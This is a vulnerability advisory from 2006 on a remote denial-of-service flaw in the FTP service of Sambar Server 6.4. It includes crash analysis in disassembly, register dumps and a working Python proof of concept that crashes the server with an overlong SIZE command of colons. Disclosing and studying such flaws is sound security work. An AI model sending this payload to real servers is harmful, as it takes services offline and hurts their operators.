Sambar Technologies All-In-One Server Remote Denial of Service Delivery: Undisclosed Severity: Medium/High Time line: 2006-01-26 Discovery Software affected: Sambar v6.4 and earlier - all platforms. Tested on: * Sambar v6.4 (Windows - Version 5.1.2600) Vendor: Author: Christoph Diehl I. BACKGROUND Sambar Technologies is a leading provider of website, email, instant messaging, and document management tools for organizations and individuals. The Sambar Server is used by thousands of businesses, schools, service providers and individuals around the world to enhance communication and collaboration. From web, email and IM, to document management and application sharing, the Sambar Server supports it all from one proven, reliable platform. II. DESCRIPTION The FTP service is vulnerable by sending a special crafted SIZE command, with a single special character, thus results in a complete application shutdown after the exception in the FTP service occurred. III. DETAILS Syntax: SIZE remote-filename 1008DAE7 call sambar._ftp_validname ; \_ftp_validname 1008DAEC add esp, 10 1008DAEF movsx edx, ax 1008DAF2 cmp edx, 1 1008DAF5 je short sambar.1008DB4E 1008DAF7 mov eax, [arg.2] 1008DAFA push eax 1008DAFB push sambar.10254D4C ; ASCII "550 Can't access %s. Invalid characters in name.\r\n" 1008DB00 push 400 1008DB05 lea ecx, [local.68] 1008DB0B push ecx 1008DB0C call sambar._cm_snprintf ; jmp to sambarcm.cm_snprintf 1008DB11 add esp, 10 1008DB14 push 1 1008DB16 push -3 1008DB18 lea edx, [local.68] 1008DB1E push edx 1008DB1F mov eax, [arg.1] 1008DB22 mov ecx, dword ptr ds:[eax+4C] ; <= CRASH 1008DB25 push ecx 1008DB26 mov edx, [arg.1] 1008DB29 mov eax, dword ptr ds:[edx+58] 1008DB2C push eax 1008DB2D call sambar._cm_net_putdata ; jmp to sambarcm.cm_net_putdata EAX 696C6176 ECX 00000133 EDX 018CE7F0 ASCII "550 Can't access c:\\AAAAAAAAAAAAAAA:::::: EBX 00000000 ESP 018CE7C0 EBP 018CE900 ASCII "::::. Invalid characters in name.\r\n" ESI 00D95F80 EDI 00CF3898 EIP 1008DB22 sambar.1008DB22 SambarCrash.dbg //===================================================== Exception code: C0000005 ACCESS_VIOLATION OS-Version: 5.1.2600 (Service Pack 2) Fault address: 1008DB22 01:0008CB22 C:\sambar64\bin\sambar.dll IV. PROOF OF CONCEPT # -*- coding: ISO-8859-1 -*- import socket, time payload = "SIZE "+":"*512 print "Sending payload:", SambarSocket = socket.socket() SambarSocket.connect(("", 21)) SambarSocket.send("USER test\r\n") SambarSocket.send("PASS test\r\n") SambarSocket.send(payload+"\r\n") SambarSocket.close() print "Done." time.sleep(1) print "Checking only FTP service:", CheckSocket = socket.socket() try: CheckSocket.connect(("", 21)) except socket.error: print "All services are down!" else: print "Running."